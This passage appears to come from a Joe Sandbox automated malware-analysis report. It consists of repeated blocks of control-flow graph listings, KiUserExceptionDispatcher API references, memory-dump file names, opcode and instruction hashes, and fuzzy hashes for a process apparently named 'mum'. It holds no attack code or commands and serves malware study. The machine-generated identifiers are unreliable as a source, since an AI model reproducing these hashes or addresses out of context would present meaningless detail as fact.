                                      • KiUserExceptionDispatcher.NTDLL ref: 003E0E1B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 586cf8b6c933999fe103951c2a5dca4b0183090ffa5b2ae4ca30c9fae3039c6b
                                      • Instruction ID: 0a2597c3e193c6ffc32816bcb1d2b77e62e8d1d7ca7be18c80fbe38b7210f66b
                                      • Opcode Fuzzy Hash: 586cf8b6c933999fe103951c2a5dca4b0183090ffa5b2ae4ca30c9fae3039c6b
                                      • Instruction Fuzzy Hash: 4FC1D374E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1027 3e0048-3e0068 1028 3e006f-3e011c KiUserExceptionDispatcher 1027->1028 1029 3e006a 1027->1029 1034 3e0124-3e0132 1028->1034 1029->1028 1035 3e044a-3e047c 1034->1035 1036 3e0138-3e014f 1034->1036 1039 3e0156-3e015f 1036->1039 1040 3e0151 1036->1040 1041 3e043d-3e0443 1039->1041 1040->1039 1042 3e0449 1041->1042 1043 3e0164-3e01da 1041->1043 1042->1035 1048 3e0296-3e02f0 1043->1048 1049 3e01e0-3e024e 1043->1049 1060 3e02f1-3e033f 1048->1060 1058 3e0250-3e0290 1049->1058 1059 3e0291-3e0294 1049->1059 1058->1059 1059->1060 1065 3e0428-3e0433 1060->1065 1066 3e0345-3e0427 1060->1066 1067 3e043a 1065->1067 1068 3e0435 1065->1068 1066->1065 1067->1041 1068->1067
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E0113
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: cfa1e4c523b0416a2420874676059c20943c6a4ba00dd8469f4fa6b227c8fa10
                                      • Instruction ID: 7445e6a62c8da8c80c64174fe691537198ff6b0067fc6a12292e698684a445e0
                                      • Opcode Fuzzy Hash: cfa1e4c523b0416a2420874676059c20943c6a4ba00dd8469f4fa6b227c8fa10
                                      • Instruction Fuzzy Hash: 48C1D474E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB395DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1243 3e11a8-3e11c8 1244 3e11cf-3e127c KiUserExceptionDispatcher 1243->1244 1245 3e11ca 1243->1245 1250 3e1284-3e1292 1244->1250 1245->1244 1251 3e15aa-3e15dc 1250->1251 1252 3e1298-3e12af 1250->1252 1255 3e12b6-3e12bf 1252->1255 1256 3e12b1 1252->1256 1257 3e159d-3e15a3 1255->1257 1256->1255 1258 3e15a9 1257->1258 1259 3e12c4-3e133a 1257->1259 1258->1251 1264 3e13f6-3e1450 1259->1264 1265 3e1340-3e13ae 1259->1265 1274 3e1451-3e149f 1264->1274 1275 3e13b0-3e13f0 1265->1275 1276 3e13f1-3e13f4 1265->1276 1281 3e1588-3e1593 1274->1281 1282 3e14a5-3e1587 1274->1282 1275->1276 1276->1274 1284 3e159a 1281->1284 1285 3e1595 1281->1285 1282->1281 1284->1257 1285->1284
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E1273
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a60f30cba82d5a383c6fc8db38ac57df7677b9e27a0dde236d9d4c04e55e76db
                                      • Instruction ID: 55d4f1cc346b6e1d0b37e39ec9690d1f80a5820824bdf6af84e928f5c37b9fb7
                                      • Opcode Fuzzy Hash: a60f30cba82d5a383c6fc8db38ac57df7677b9e27a0dde236d9d4c04e55e76db
                                      • Instruction Fuzzy Hash: 0CC1D574E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD409AB395DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1081 3e04a0-3e04c0 1082 3e04c7-3e0574 KiUserExceptionDispatcher 1081->1082 1083 3e04c2 1081->1083 1088 3e057c-3e058a 1082->1088 1083->1082 1089 3e08a2-3e08d4 1088->1089 1090 3e0590-3e05a7 1088->1090 1093 3e05ae-3e05b7 1090->1093 1094 3e05a9 1090->1094 1095 3e0895-3e089b 1093->1095 1094->1093 1096 3e05bc-3e0632 1095->1096 1097 3e08a1 1095->1097 1102 3e06ee-3e0748 1096->1102 1103 3e0638-3e06a6 1096->1103 1097->1089 1114 3e0749-3e0797 1102->1114 1112 3e06a8-3e06e8 1103->1112 1113 3e06e9-3e06ec 1103->1113 1112->1113 1113->1114 1119 3e079d-3e087f 1114->1119 1120 3e0880-3e088b 1114->1120 1119->1120 1122 3e088d 1120->1122 1123 3e0892 1120->1123 1122->1123 1123->1095
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E056B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: acbd453096f4406c082c955f18f15fba9bb057b183a0379ddd72cf4c62767253
                                      • Instruction ID: 63a093c0617b7e5ee1e5583797da46acca22d267cff5af52f80e959c1c60e69e
                                      • Opcode Fuzzy Hash: acbd453096f4406c082c955f18f15fba9bb057b183a0379ddd72cf4c62767253
                                      • Instruction Fuzzy Hash: 0CC1D374E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1729 3e6c90-3e6cb0 1730 3e6cb7-3e6d64 KiUserExceptionDispatcher 1729->1730 1731 3e6cb2 1729->1731 1736 3e6d6c-3e6d7a 1730->1736 1731->1730 1737 3e7092-3e70c4 1736->1737 1738 3e6d80-3e6d97 1736->1738 1741 3e6d9e-3e6da7 1738->1741 1742 3e6d99 1738->1742 1743 3e7085-3e708b 1741->1743 1742->1741 1744 3e6dac-3e6e22 1743->1744 1745 3e7091 1743->1745 1750 3e6ede-3e6f38 1744->1750 1751 3e6e28-3e6e96 1744->1751 1745->1737 1762 3e6f39-3e6f87 1750->1762 1760 3e6e98-3e6ed8 1751->1760 1761 3e6ed9-3e6edc 1751->1761 1760->1761 1761->1762 1767 3e6f8d-3e706f 1762->1767 1768 3e7070-3e707b 1762->1768 1767->1768 1770 3e707d 1768->1770 1771 3e7082 1768->1771 1770->1771 1771->1743
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E6D5B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 390d3c547ffeea856a5bcee5858fe68e8c4b69f61a789a0ce0021c17502e1ba9
                                      • Instruction ID: f8a4efb1294f37caf50d75473f11540ef4c466f7e37e122f8cb1a2f78e99ed5b
                                      • Opcode Fuzzy Hash: 390d3c547ffeea856a5bcee5858fe68e8c4b69f61a789a0ce0021c17502e1ba9
                                      • Instruction Fuzzy Hash: 9AC1C374E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1567 3e5f88-3e5fa8 1568 3e5faf-3e605c KiUserExceptionDispatcher 1567->1568 1569 3e5faa 1567->1569 1574 3e6064-3e6072 1568->1574 1569->1568 1575 3e638a-3e63bc 1574->1575 1576 3e6078-3e608f 1574->1576 1579 3e6096-3e609f 1576->1579 1580 3e6091 1576->1580 1581 3e637d-3e6383 1579->1581 1580->1579 1582 3e6389 1581->1582 1583 3e60a4-3e611a 1581->1583 1582->1575 1588 3e61d6-3e6230 1583->1588 1589 3e6120-3e618e 1583->1589 1600 3e6231-3e627f 1588->1600 1598 3e6190-3e61d0 1589->1598 1599 3e61d1-3e61d4 1589->1599 1598->1599 1599->1600 1605 3e6368-3e6373 1600->1605 1606 3e6285-3e6367 1600->1606 1607 3e637a 1605->1607 1608 3e6375 1605->1608 1606->1605 1607->1581 1608->1607
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E6053
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 4e85f1fc359d7c08ccff073c64d1b2c8e96c6615c1a0a21f38318cb768a662ac
                                      • Instruction ID: c1786ad1ec2ca0c7a7750c971302f01b593fc05fd66104d56e432f5dce7ce6ba
                                      • Opcode Fuzzy Hash: 4e85f1fc359d7c08ccff073c64d1b2c8e96c6615c1a0a21f38318cb768a662ac
                                      • Instruction Fuzzy Hash: 55C1D274E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1135 3e08f8-3e0918 1136 3e091f-3e09cc KiUserExceptionDispatcher 1135->1136 1137 3e091a 1135->1137 1142 3e09d4-3e09e2 1136->1142 1137->1136 1143 3e0cfa-3e0d2c 1142->1143 1144 3e09e8-3e09ff 1142->1144 1147 3e0a06-3e0a0f 1144->1147 1148 3e0a01 1144->1148 1149 3e0ced-3e0cf3 1147->1149 1148->1147 1150 3e0cf9 1149->1150 1151 3e0a14-3e0a8a 1149->1151 1150->1143 1156 3e0b46-3e0ba0 1151->1156 1157 3e0a90-3e0afe 1151->1157 1168 3e0ba1-3e0bef 1156->1168 1166 3e0b00-3e0b40 1157->1166 1167 3e0b41-3e0b44 1157->1167 1166->1167 1167->1168 1173 3e0cd8-3e0ce3 1168->1173 1174 3e0bf5-3e0cd7 1168->1174 1175 3e0cea 1173->1175 1176 3e0ce5 1173->1176 1174->1173 1175->1149 1176->1175
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E09C3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0e77b455129147220ea5fb5e74d29bacc0846c54462c2a59a313e93e04fae247
                                      • Instruction ID: a7c4a0061a2b32c12801607ab725f9c662281332dc4c1291d173f05a74d47a1d
                                      • Opcode Fuzzy Hash: 0e77b455129147220ea5fb5e74d29bacc0846c54462c2a59a313e93e04fae247
                                      • Instruction Fuzzy Hash: 45C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1621 3e63e0-3e6400 1622 3e6407-3e64b4 KiUserExceptionDispatcher 1621->1622 1623 3e6402 1621->1623 1628 3e64bc-3e64ca 1622->1628 1623->1622 1629 3e67e2-3e6814 1628->1629 1630 3e64d0-3e64e7 1628->1630 1633 3e64ee-3e64f7 1630->1633 1634 3e64e9 1630->1634 1635 3e67d5-3e67db 1633->1635 1634->1633 1636 3e64fc-3e6572 1635->1636 1637 3e67e1 1635->1637 1642 3e662e-3e6688 1636->1642 1643 3e6578-3e65e6 1636->1643 1637->1629 1654 3e6689-3e66d7 1642->1654 1652 3e65e8-3e6628 1643->1652 1653 3e6629-3e662c 1643->1653 1652->1653 1653->1654 1659 3e66dd-3e67bf 1654->1659 1660 3e67c0-3e67cb 1654->1660 1659->1660 1662 3e67cd 1660->1662 1663 3e67d2 1660->1663 1662->1663 1663->1635
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E64AB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: b9709a917877acf534f744d746d72af71f13ed354d832a3c713ac9d79e6357e9
                                      • Instruction ID: a336e784ce53f41f9ec037eb9935e190b7ada704c7cc1580d7edc26693933b22
                                      • Opcode Fuzzy Hash: b9709a917877acf534f744d746d72af71f13ed354d832a3c713ac9d79e6357e9
                                      • Instruction Fuzzy Hash: 6CC1D474E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1459 3e56d8-3e56f8 1460 3e56ff-3e57ac KiUserExceptionDispatcher 1459->1460 1461 3e56fa 1459->1461 1466 3e57b4-3e57c2 1460->1466 1461->1460 1467 3e5ada-3e5b0c 1466->1467 1468 3e57c8-3e57df 1466->1468 1471 3e57e6-3e57ef 1468->1471 1472 3e57e1 1468->1472 1473 3e5acd-3e5ad3 1471->1473 1472->1471 1474 3e5ad9 1473->1474 1475 3e57f4-3e586a 1473->1475 1474->1467 1480 3e5926-3e5980 1475->1480 1481 3e5870-3e58de 1475->1481 1492 3e5981-3e59cf 1480->1492 1490 3e58e0-3e5920 1481->1490 1491 3e5921-3e5924 1481->1491 1490->1491 1491->1492 1497 3e5ab8-3e5ac3 1492->1497 1498 3e59d5-3e5ab7 1492->1498 1499 3e5aca 1497->1499 1500 3e5ac5 1497->1500 1498->1497 1499->1473 1500->1499
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E57A3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: e268a699d46039f25c1258196bb7e542cfdc288b7f7bedbfef9219448f84ecda
                                      • Instruction ID: 00664a540e2bea15fcd2569e9012871119b7c975feec58de256d19cbad486211
                                      • Opcode Fuzzy Hash: e268a699d46039f25c1258196bb7e542cfdc288b7f7bedbfef9219448f84ecda
                                      • Instruction Fuzzy Hash: 49C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E8793
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 6a1307d403566582905d079a3cfd4dac6d052ff808d4b8fedd01a272fb5710d8
                                      • Instruction ID: 23a2da39bbba9219e795699491093666d38d04292a00c667f644145bf5af70a0
                                      • Opcode Fuzzy Hash: 6a1307d403566582905d079a3cfd4dac6d052ff808d4b8fedd01a272fb5710d8
                                      • Instruction Fuzzy Hash: 81C1D474E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E7A8B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0718b98a28a58c785b94a73b161c2d32990d61edf88b9285fa57352c62b3ce18
                                      • Instruction ID: 5a01ee526826a293951cccd2c066a6f2fa9607a768250fbc5b9d2085a0c9e3b1
                                      • Opcode Fuzzy Hash: 0718b98a28a58c785b94a73b161c2d32990d61edf88b9285fa57352c62b3ce18
                                      • Instruction Fuzzy Hash: FCC1D274E04218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E0113
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 327ef6235f69647b834d45b5dbbfa8161470ff362c9f6c84b98994dbf91f38c4
                                      • Instruction ID: 482ed84b7f4cde037b3590db775ac1002a5e397027488a7077ab8d0f71e02e52
                                      • Opcode Fuzzy Hash: 327ef6235f69647b834d45b5dbbfa8161470ff362c9f6c84b98994dbf91f38c4
                                      • Instruction Fuzzy Hash: 62412770D05288CFDB19DFBAD85069EBBF2AF89300F24C16AC454AB3A6DB344949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E5BFB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 673a29a24863855621f9d247660cfadf48dfd4dadd803f4d407fc637582d9dab
                                      • Instruction ID: 9fc04f0faca88b31784a3eee57d518e198046e82a81c4d294b573e057cfa5180
                                      • Opcode Fuzzy Hash: 673a29a24863855621f9d247660cfadf48dfd4dadd803f4d407fc637582d9dab
                                      • Instruction Fuzzy Hash: AF41E270E05648CFDB19DFBAC4516DEBBF2AF89304F24D12AD414AB2A9DB34494ACF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E6903
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ca565a1a6472bcbf2703f931cc1bac00d247bb0bfe714315ecb1446acaac7dd7
                                      • Instruction ID: 69e9c71d6c41ab508a6f51dae87aa4a56ee92d9ec22816c31f81ffcadc3a5910
                                      • Opcode Fuzzy Hash: ca565a1a6472bcbf2703f931cc1bac00d247bb0bfe714315ecb1446acaac7dd7
                                      • Instruction Fuzzy Hash: A2410470E01248CFDB19DFAAD5516EEBBF2AF89304F24D12AD418BB265DB340949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E64AB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 563a84027ab6a03460b64560f726485dd0aa25c4d3e0c36736c82f65648197e6
                                      • Instruction ID: 20f4ed6f423583f65066de5b2d2fcc1f50ae1a5e9bb2cd6d311237122ed1ef00
                                      • Opcode Fuzzy Hash: 563a84027ab6a03460b64560f726485dd0aa25c4d3e0c36736c82f65648197e6
                                      • Instruction Fuzzy Hash: AB41F370E05258CBDB19DFBAC45169EBBB2AF89304F24D12AD414AB2A5DB344949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E6053
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 5f1048ae10296d3853f4f96fe2dc3153c90ad90ed81166ee7558f0d5ce41aa16
                                      • Instruction ID: 2cfdd8258451646be53157539c6965c6ef00c9e8cef6ca9f5d04c5fc54c37af4
                                      • Opcode Fuzzy Hash: 5f1048ae10296d3853f4f96fe2dc3153c90ad90ed81166ee7558f0d5ce41aa16
                                      • Instruction Fuzzy Hash: 6441F374E01248CBDB19DFAAC9416DEBBF2AF89300F24D22AD415AB3A5DB345949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E833B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: bee3032c6a6c83fc575f700493e7b9190e1353806700548a3dd7ef81cd485f9b
                                      • Instruction ID: bea9bbf92323d7a329f8f164a64e1fec27b176ecad1fb56ad2091052b40f1951
                                      • Opcode Fuzzy Hash: bee3032c6a6c83fc575f700493e7b9190e1353806700548a3dd7ef81cd485f9b
                                      • Instruction Fuzzy Hash: 5841F370E01248CBDB19DFAAC5546DEBBF2AF89304F24D12AC518BB2A5DB34494ACF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E7633
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 05b920d76540c4c54921b27dd86806357722c1b5f59d2b33b815ff1b75a7e884
                                      • Instruction ID: 1aeca36c57aac577f8ac273b5176b15a51721689247aaccd1521e656c7981c52
                                      • Opcode Fuzzy Hash: 05b920d76540c4c54921b27dd86806357722c1b5f59d2b33b815ff1b75a7e884
                                      • Instruction Fuzzy Hash: 5A41F570D04248CBDB19DFAAC4546EEFBF2AF89300F24C12AD414BB699EB344946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E7A8B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ab725ea721b9d75e73531b506c9be29f286ff236a47cf4d8866d5d5047c5f7a6
                                      • Instruction ID: c40b506ed808c592b4aaad713294ba0a9cfb38fa7bdfa9a8618a5e18986f6305
                                      • Opcode Fuzzy Hash: ab725ea721b9d75e73531b506c9be29f286ff236a47cf4d8866d5d5047c5f7a6
                                      • Instruction Fuzzy Hash: 5141F170E04248CFDB19DFAAC8556EEBBF2AF89300F24C12AD405AB6A9DB345945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E8793
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 7a1639baa132af5bf45de9bf92e4b9a8d83adad9d56381ebcd873d70d0d59328
                                      • Instruction ID: b20924d2f033b3926ed54b0c85097f150c352447464e3738ecdf41228963897f
                                      • Opcode Fuzzy Hash: 7a1639baa132af5bf45de9bf92e4b9a8d83adad9d56381ebcd873d70d0d59328
                                      • Instruction Fuzzy Hash: 2A410570D04248CFDB19DFAAC4516EEBBF2AF89300F24C12AD418BB2A5DB345949CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E6D5B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8b5985c06ee794782feb8540624457be632884323a779af5f8cfb4bc751fa73f
                                      • Instruction ID: 99fa36b854fa32a5b29ccf97aa6ddf2d447d81aa50d360649145664e2dc1d97e
                                      • Opcode Fuzzy Hash: 8b5985c06ee794782feb8540624457be632884323a779af5f8cfb4bc751fa73f
                                      • Instruction Fuzzy Hash: C441E270E05248CBDB19DFAAC8416EEFBB6AF89300F24D12AD414BB3A9DB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E09C3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 065479fb2ef8798c7e0015c09b59a2df17beec12eade81774041ab475b24660e
                                      • Instruction ID: c9398ecce0c2e7ed8d09986aada2184d0cde396fc702c0facc2bf26211bccc41
                                      • Opcode Fuzzy Hash: 065479fb2ef8798c7e0015c09b59a2df17beec12eade81774041ab475b24660e
                                      • Instruction Fuzzy Hash: FC411370E05248CFDB19DFAAC85069EFBB2AF89304F24D22AC414BB2A9DB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E7EE3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: f93af0e86dd06514624545684be563f838474aa6ceddff16e69d4ad9e186739f
                                      • Instruction ID: 8446fdc71c11f0b44ab0656476618b2b482dfaadd6477dbe5accc9f13d34a2d8
                                      • Opcode Fuzzy Hash: f93af0e86dd06514624545684be563f838474aa6ceddff16e69d4ad9e186739f
